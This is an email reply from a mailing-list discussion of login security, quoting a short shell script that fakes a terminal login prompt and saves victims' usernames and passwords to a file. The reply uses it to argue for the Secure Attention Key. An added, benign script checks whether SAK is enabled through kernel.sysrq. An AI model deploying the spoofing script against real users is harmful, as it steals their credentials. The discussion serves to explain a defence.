> > You have a fundamental flaw in your assumptions, since you don't take into
> > account the fact that unless the security of the system is very badly
> > messed up already, if a user is able to substitute his own program for
> > the normal login/getty, he can also exchange his programs for whatever
> > else you add to give better "security".
>
> What about just starting (as evil_user, who has an account) the following,
> hiding behind a corner, and waiting for another user?
>
> #!/bin/sh
> #
> echo -n "`uname -n` login: "
> read LOGIN
> echo -n "Password: "
> read PW
> echo $LOGIN $PW >> ~/sneaked_passwords.txt
> chmod 0600 ~/sneaked_passwords.txt
> echo "Login incorrect"
> sleep 1
> logout
> (of course, this has to be a text terminal)

Press SAK and be done.

> > <asbestos>
> > The reason why people said your suggestion was the "NT way", is that it
> > makes life harder to everyone trying to use the system, without adding to
> > the actual security of the system.
> > </asbestos>
>
> the most secure way of logging in I have seen so far is the following (I
> helped set it up, kind of, in a firm I jobbed during holidays).
>
> Everyone has a pager or a manager tamagotchi (mobile phone). Logging in
> makes /bin/login send a random string (like from 'pwgen') as e-mail to an
> email<->SMS gateway. A couple seconds later this string pops up on their
> pagers, they enter it. THEN they enter their own (private)
> password.

Ok, so my fake login has to send them email. You _still_ have to press SAK.

> Of course, you will have to have your pager with you, but you get used to
> that. One big advantage is that you will always be warned at once if someone
> tries to log into your account, better yet _from where_ if the terminal id
> is included in this one time SMS password.
Pavel
--
I'm really pavel@atrey.karlin.mff.cuni.cz. Pavel
Look at http://atrey.karlin.mff.cuni.cz/~pavel/ ;-).
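
Added example, not part of the original message: the reply above relies on SAK being usable at the console, which on current Linux kernels depends on the kernel.sysrq setting (SAK is Alt+SysRq+K and kills every program on the current virtual console, a fake login prompt included). The script below interprets that setting using the bit values from the kernel's sysrq documentation. The function names are made up for this example.

```shell
#!/bin/sh
# Added example: decide whether SAK (Alt+SysRq+K) is usable, given a
# kernel.sysrq value. Meanings per the kernel's sysrq documentation:
#   0 = SysRq disabled, 1 = all functions enabled,
#   otherwise a bitmask in which 0x4 allows keyboard control (SAK, unraw).

# sak_state VALUE -> prints "enabled", "disabled" or "unknown"
# (hypothetical helper name, not a system tool)
sak_state() {
    case "$1" in
        ''|*[!0-9]*) echo unknown; return 0 ;;   # empty or non-numeric input
    esac
    if [ "$1" -eq 0 ]; then
        echo disabled
    elif [ "$1" -eq 1 ]; then
        echo enabled                 # 1 means "everything", not bit 0 only
    elif [ $(( $1 & 4 )) -ne 0 ]; then
        echo enabled                 # keyboard-control bit is set
    else
        echo disabled                # SysRq partly on, but SAK masked out
    fi
}

# current_sak_state [FILE] -> state for the running kernel
# FILE defaults to the sysctl file; the argument exists so the logic
# can be exercised against a sample file.
current_sak_state() {
    f="${1:-/proc/sys/kernel/sysrq}"
    if [ -r "$f" ]; then
        sak_state "$(cat "$f")"
    else
        # No readable sysctl file: kernel built without magic SysRq, or no /proc.
        echo unknown
    fi
}

echo "SAK on this console: $(current_sak_state)"
```

A "disabled" result on a multi-user text console means a user has no trusted way to clear a spoofed prompt before typing a password.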